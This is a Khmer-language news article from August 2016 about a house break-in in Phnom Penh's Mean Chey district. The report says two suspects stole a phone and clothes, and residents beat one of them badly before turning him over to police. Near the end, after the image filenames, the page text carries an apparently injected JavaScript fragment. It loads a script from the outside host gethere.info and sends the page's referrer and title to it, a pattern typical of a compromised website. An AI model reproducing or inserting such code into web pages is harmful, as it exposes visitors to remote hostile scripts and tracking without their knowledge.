គាស់ផ្ទះយកទូរស័ព្ទ​ រត់មិនរួចពលរដ្ឋកាត់ទោសសល់ដង្ហើមចង្រិត​ រួចប្រគល់អោយសមត្ថកិច្ចយកស្នាដៃ(video)

 

ភ្នំពេញ៖ ជនសង្ស័យមានគ្នាពីរនាក់បានធ្វើសកម្មភាពគាស់ផ្ទះជួលមួយកន្លែងយកទូរស័ព្ទ និងកាបូបខោអាវបានហើយរត់មិនរួចត្រូវប្រជាពរដ្ឋចាប់បានម្នាក់វ៉ៃឡើងទ្រមខ្លួននៅដង្ហើមចង្រិតទើបប្រគល់អោយសមត្ថកិច្ច។ហេតុការណ៍នេះកើតឡើងនៅវេលាម៉ោង១និង២០នាទីយប់រំលងអធ្រាតឈានចូលថ្ងៃទី១៩ខែសីហាឆ្នាំ២០១៦ស្ថិតក្នុងភូមិទ្រា៣ក្រុម២សង្កាត់ស្ទឹងមានជ័យខណ្ឌមានជ័យ។

 

យោងតាមព័ត៍មានពីប្រជាពរដ្ឋបានអោយដឹងថាមុនពេលកើតហេតុគេឃើញជនសង្ស័យមានគ្នាពីរនាក់ម្នាក់នៅចាំផ្លូវនិងម្នាក់ទៀតបានដើរទៅឡើងផ្ទះជួលមួយកន្លែងម្ចាស់មិននៅចាក់សោរចោលទៅលក់បន្លែនៅផ្សារដើមគរបានធ្វើសកម្មភាពគាស់ចូលលួចយកបានទូរសព្ទ័មួយគ្រឿងនិងកាតាបខោអាវបានហើយរត់ឡើងជិះកង់បីទៅបាត់នៅម្នាក់ទៀតរត់មិនរួចត្រូវប្រជាពរដ្ឋពទ្ធ័ចាប់បានវ៉ៃនៅសល់ដង្ហើមចង្រិតទើបប្រគល់អោយសមត្ថកិច្ច។

 

ជនសង្ស័យមានវណ្ណារិទ្ធភេទប្រុសអាយុ២៩ឆ្នាំមុខរបមិនពិតប្រាកដស្នាក់ម្តុំផ្សារសឡា។

 

ជនសង្ស័យត្រូវសមត្ថកិច្ចប៉ុស្តិ៍ស្ទឹងមានជ័យនាំខ្លួនបណ្ដោះអាសន្ននិងបញ្ជូនបន្តទៅធិការដ្ឋានដើម្បីកសាងសំណំរឿងទៅតុលាការចាត់ការតាមផ្លូវច្បាប់។ដោយ៖ព្រះអង្គខ្មៅមានរិទ្ធិ

IMG-20160819-WA0040 IMG-20160819-WA0034s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More